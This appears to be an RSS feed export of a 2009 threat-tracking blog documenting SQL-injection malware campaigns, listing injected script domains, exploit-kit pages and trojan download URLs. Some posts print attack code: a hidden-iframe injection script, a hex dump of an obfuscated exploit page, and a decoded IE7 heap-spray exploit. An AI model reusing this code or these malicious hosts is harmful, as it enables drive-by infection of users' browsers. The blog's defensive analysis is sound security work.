<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>s3c-watch</title>
	<atom:link href="http://s3cwatch.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://s3cwatch.wordpress.com</link>
	<description>security watch</description>
	<lastBuildDate>Tue, 01 Sep 2009 16:21:47 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='s3cwatch.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/124c9abafa5a68c049d121663afcf218?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>s3c-watch</title>
		<link>http://s3cwatch.wordpress.com</link>
	</image>
			<item>
		<title>z360.net/a.js</title>
		<link>http://s3cwatch.wordpress.com/2009/09/02/z360-neta-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/09/02/z360-neta-js/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 16:21:47 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=175</guid>
		<description><![CDATA[this injected script also has several associated domains

dd45h.8866.org/fkzd/16.htm
wm.1kfie.cn/x150/xx.html

One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=175&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>this injected script also has several associated domains</p>
<ul>
<li>dd45h.8866.org/fkzd/16.htm</li>
<li>wm.1kfie.cn/x150/xx.html</li>
</ul>
<p>One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [<a title="VT analysis" href="http://www.virustotal.com/analisis/7c197a3bb146a10a1942f08ad762e66576fff2b6d85053eadbabcb2bf1a10e4e-1251821306" target="_blank">VT Analysis</a>]</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/175/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=175&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/09/02/z360-neta-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>k.18xn.com/x.js</title>
		<link>http://s3cwatch.wordpress.com/2009/09/01/k-18xn-comx-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/09/01/k-18xn-comx-js/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 15:58:23 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=173</guid>
		<description><![CDATA[active sql-injection attack.
Injected scripts and exploits iframe to several urls such as:

www.gehae.info/fox/index.html
www.haerh.info/mam.exe

the scripts generate some form of &#8216;time-based&#8217; parameters that probably is only available for a brief period.
The trojan downloader from www.haerh.info get a list of evil programs from www.gehae.info/2.txt
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=173&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>active sql-injection attack.</p>
<p>Injected scripts and exploits iframe to several urls such as:</p>
<ul>
<li>www.gehae.info/fox/index.html</li>
<li>www.haerh.info/mam.exe</li>
</ul>
<p>the scripts generate some form of &#8216;time-based&#8217; parameters that probably is only available for a brief period.</p>
<p>The trojan downloader from www.haerh.info get a list of evil programs from www.gehae.info/2.txt</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/173/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=173&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/09/01/k-18xn-comx-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>a0v.org/x.js</title>
		<link>http://s3cwatch.wordpress.com/2009/07/23/a0v-orgx-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/07/23/a0v-orgx-js/#comments</comments>
		<pubDate>Thu, 23 Jul 2009 15:42:10 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=170</guid>
		<description><![CDATA[another round of sql-injection attacks.
x.js calls iframe src www.jejsaj.com/ya/index.html
jejsaj contains various exploits targeting among others

owc 0-day
realplayer
msvidctl.dll

the exploits download trojans from www.wowand.com
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=170&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>another round of sql-injection attacks.</p>
<p>x.js calls iframe src www.jejsaj.com/ya/index.html</p>
<p>jejsaj contains various exploits targeting among others</p>
<ul>
<li>owc 0-day</li>
<li>realplayer</li>
<li>msvidctl.dll</li>
</ul>
<p>the exploits download trojans from www.wowand.com</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/170/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=170&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/07/23/a0v-orgx-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>f1y.in/j.js</title>
		<link>http://s3cwatch.wordpress.com/2009/07/11/f1y-inj-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/07/11/f1y-inj-js/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 04:17:26 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=166</guid>
		<description><![CDATA[another round of sql-injection attempt
Update: beware of this malicious script as it is making use of OWC 0-day.
Ref &#8211; http://isc.sans.org/diary.html?storyid=6811
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=166&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>another round of sql-injection attempt</p>
<p>Update: beware of this malicious script as it is making use of OWC 0-day.<br />
Ref &#8211; http://isc.sans.org/diary.html?storyid=6811</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/166/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=166&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/07/11/f1y-inj-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>218.213.77.96/a.js</title>
		<link>http://s3cwatch.wordpress.com/2009/05/28/218-213-77-96a-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/05/28/218-213-77-96a-js/#comments</comments>
		<pubDate>Thu, 28 May 2009 14:10:17 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=164</guid>
		<description><![CDATA[a recent round of sql-injected link.
a.js links in more iframes which exploits the typical basket of exploits, targeting flash, IE7, snapshot viewer, realplayer, etc.
Ultimately the exploits installs a trojan [VT analysis]
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=164&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>a recent round of sql-injected link.<br />
<span id="more-164"></span>a.js links in more iframes which exploits the typical basket of exploits, targeting flash, IE7, snapshot viewer, realplayer, etc.</p>
<p>Ultimately the exploits installs a trojan [<a title="VT analysis" href="http://www.virustotal.com/analisis/bdf8b6ce2d2579b7d52dd91add66eabed34ca72aa1de7517d00ffd118c2e2bac-1243519083" target="_blank">VT analysis</a>]</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/164/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=164&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/05/28/218-213-77-96a-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>3b3.org/c.js</title>
		<link>http://s3cwatch.wordpress.com/2009/04/16/3b3orgcjs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/04/16/3b3orgcjs/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 13:46:45 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=159</guid>
		<description><![CDATA[This sql-injected script src has been around for some time.
The interesting point of this script is that it behaves differently if the injected site is from &#8220;.gov.cn&#8221; or &#8220;.edu.cn&#8221;. Code as shown below:
var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i&#60;arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) &#62; -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("&#60;iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0&#62;&#60;/
iframe&#62;");
function rl()
{
var msgObj [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=159&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This sql-injected script src has been around for some time.</p>
<p>The interesting point of this script is that it behaves differently if the injected site is from &#8220;.gov.cn&#8221; or &#8220;.edu.cn&#8221;. Code as shown below:<span id="more-159"></span></p>
<p><code>var s,siteUrl,tmpdomain;<br />
var arydomain = new Array(".gov.cn",".edu.cn");<br />
s = document.location+"";<br />
siteUrl=s.substring(7,s.indexOf('/',7));<br />
tmpdomain = 0;<br />
for(var i=0;i&lt;arydomain.length; i++)<br />
{<br />
if(siteUrl.indexOf(arydomain[i]) &gt; -1){<br />
tmpdomain = 1;<br />
break;<br />
}<br />
}<br />
if(tmpdomain == 0){<br />
document.writeln("&lt;iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0&gt;&lt;/<br />
iframe&gt;");<br />
function rl()<br />
{<br />
var msgObj = document.createElement("div");<br />
msgObj.setAttribute("id","msgDiv");<br />
document.body.appendChild(msgObj);<br />
var obj = document.getElementById("msgDiv");<br />
obj.innerHTML ="&lt;iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0&gt;&lt;/<br />
iframe&gt;";<br />
}<br />
setInterval("rl()",10000);<br />
}</code></p>
<p>The injected iframe a100.htm inserts another iframe au.htm.</p>
<p>au.htm deploys another obfuscation technique, which is to embed null bytes into the file. The top portion of the file is as shown:</p>
<p><font size="-3"><code>00000000  3c 00 00 68 00 74 00 6d  6c 3e 00 00 0d 0a 00 00  |&lt;..h.t.ml&gt;......|<br />
00000010  3c 00 00 73 00 00 63 72  00 69 00 00 70 00 00 74  |&lt;..s..cr.i..p..t|<br />
00000020  00 3e 00 00 0d 00 00 0a  69 00 00 66 00 28 00 6e  |.&gt;......i..f.(.n|<br />
00000030  00 00 61 76 00 69 00 67  61 00 74 00 6f 72 2e 00  |..av.i.ga.t.or..|<br />
00000040  00 75 00 00 73 00 65 00  00 72 00 00 41 67 00 00  |.u..s.e..r..Ag..|<br />
00000050  65 00 00 6e 74 00 2e 74  00 00 6f 00 00 4c 6f 00  |e..nt..t..o..Lo.|<br />
00000060  77 65 72 00 00 43 61 73  65 00 28 29 00 00 2e 00  |wer..Case.()....|</code></font></p>
<p>If all the bytes 00 are removed, you get back a beautiful html file.</p>
<p>au.htm contains links to exploits of typical vulnerabilities. One malicious file that will be downloaded is http://xia8866.com/xia/f5.css [<a href="http://www.threatexpert.com/report.aspx?md5=214c6a1b962656d2357ed5027508b589">Threatexpert result</a>]</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/159/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=159&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/04/16/3b3orgcjs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>cn0093.cn/v.js</title>
		<link>http://s3cwatch.wordpress.com/2009/03/09/cn0093cnvjs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/03/09/cn0093cnvjs/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 14:50:40 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=157</guid>
		<description><![CDATA[following previous post, a new injected script has emerged that resolves to same IP.
v.js retrieves another iframe src www.vieio.cn/i.htm.
This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=157&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>following previous post, a new injected script has emerged that resolves to same IP.</p>
<p>v.js retrieves another iframe src www.vieio.cn/i.htm.</p>
<p>This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/157/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=157&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/03/09/cn0093cnvjs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>tsnse.cn/i.js</title>
		<link>http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/#comments</comments>
		<pubDate>Thu, 05 Mar 2009 15:37:46 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=155</guid>
		<description><![CDATA[This sql-injected script calls iframe www.gomne.cn/yh.htm
yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit.
The exploits download malicious executable from www.at820.cn/wins.exe [VT results]
CWSandbox analysis of wins.exe shows further download such as rootkit www.at820.cn/ie.exe [VT results]
Note that all 3 domains tsnse.cn, www.gomne.cn and www.at820.cn resolve to the same IP address [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=155&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This sql-injected script calls iframe www.gomne.cn/yh.htm</p>
<p><span id="more-155"></span>yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit.</p>
<p>The exploits download malicious executable from www.at820.cn/wins.exe [<a title="VirusTotal analysis" href="http://www.virustotal.com/analisis/0a58b5ea47b7ae9ad3b8b2c5bf4df5e5" target="_blank">VT results</a>]</p>
<p><a title="Sunbelt analysis" href="http://research.sunbeltsoftware.com/ViewMalware.aspx?id=7814080" target="_blank">CWSandbox analysis</a> of wins.exe shows further download such as rootkit www.at820.cn/ie.exe [<a title="VirusTotal analysis" href="http://www.virustotal.com/analisis/c2878e2974c0f346acdbf2ffe8bc36b9" target="_blank">VT results</a>]</p>
<p>Note that all 3 domains tsnse.cn, www.gomne.cn and www.at820.cn resolve to the same IP address 120.50.35.138.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/155/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=155&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>deabak.com/z.js</title>
		<link>http://s3cwatch.wordpress.com/2009/02/26/deabakcomzjs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/02/26/deabakcomzjs/#comments</comments>
		<pubDate>Thu, 26 Feb 2009 14:10:39 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=152</guid>
		<description><![CDATA[this is a new script that are being sql-injected.
z.js contains a iframe from www.893500.cn/2/index.htm
The index.htm contains links to several the typical variety of exploits. One of which 02.htm is a MS09-02 exploit.
The IE7 exploit is decoded as follows:
var b=unescape(&#8220;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;C&#8221;+&#8221;0&#8243;+&#8221;C&#8221;+&#8221;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;C&#8221;+&#8221;0&#8243;+&#8221;C&#8221;);
var test99=yumen;
var yumen=new Array();
Tameeeeee=unescape(ttt.replace(/Game/g,&#8221;\x25\x75&#8243;));
while(b.length&#60;0&#215;100000-(ttt.length*2+0&#215;01020)/2){b+=b}var lh=b.substring(0,0&#215;100000-(ttt.length*2+0&#215;01020)/2);
for(i=0; i&#60;0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
var s1=unescape(&#8220;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;kfkfkfkfkfkfkfkfkfkfkfkfk&#8221;);
var a1=new Array();
for(var x=0; x&#60;1000; x++)a1.push(document.createElement(&#8220;img&#8221;));
function ok(){o1=document.createElement(&#8220;tbody&#8221;);
o1.click;
var o2=o1.cloneNode();
o1.clearAttributes();
o1=null;
CollectGarbage();
for(var x=0; x&#60;a1.length; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=152&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>this is a new script that are being sql-injected.</p>
<p>z.js contains a iframe from www.893500.cn/2/index.htm</p>
<p><span id="more-152"></span>The index.htm contains links to several the typical variety of exploits. One of which 02.htm is a MS09-02 exploit.</p>
<p>The IE7 exploit is decoded as follows:</p>
<p>var b=unescape(&#8220;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;C&#8221;+&#8221;0&#8243;+&#8221;C&#8221;+&#8221;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;C&#8221;+&#8221;0&#8243;+&#8221;C&#8221;);<br />
var test99=yumen;<br />
var yumen=new Array();<br />
Tameeeeee=unescape(ttt.replace(/Game/g,&#8221;\x25\x75&#8243;));<br />
while(b.length&lt;0&#215;100000-(ttt.length*2+0&#215;01020)/2){b+=b}var lh=b.substring(0,0&#215;100000-(ttt.length*2+0&#215;01020)/2);<br />
for(i=0; i&lt;0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();<br />
var s1=unescape(&#8220;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;%&#8221;+&#8221;u&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;0&#8243;+&#8221;b&#8221;+&#8221;kfkfkfkfkfkfkfkfkfkfkfkfk&#8221;);<br />
var a1=new Array();<br />
for(var x=0; x&lt;1000; x++)a1.push(document.createElement(&#8220;img&#8221;));<br />
function ok(){o1=document.createElement(&#8220;tbody&#8221;);<br />
o1.click;<br />
var o2=o1.cloneNode();<br />
o1.clearAttributes();<br />
o1=null;<br />
CollectGarbage();<br />
for(var x=0; x&lt;a1.length; x++)a1[x].src=s1; o2.click}</p>
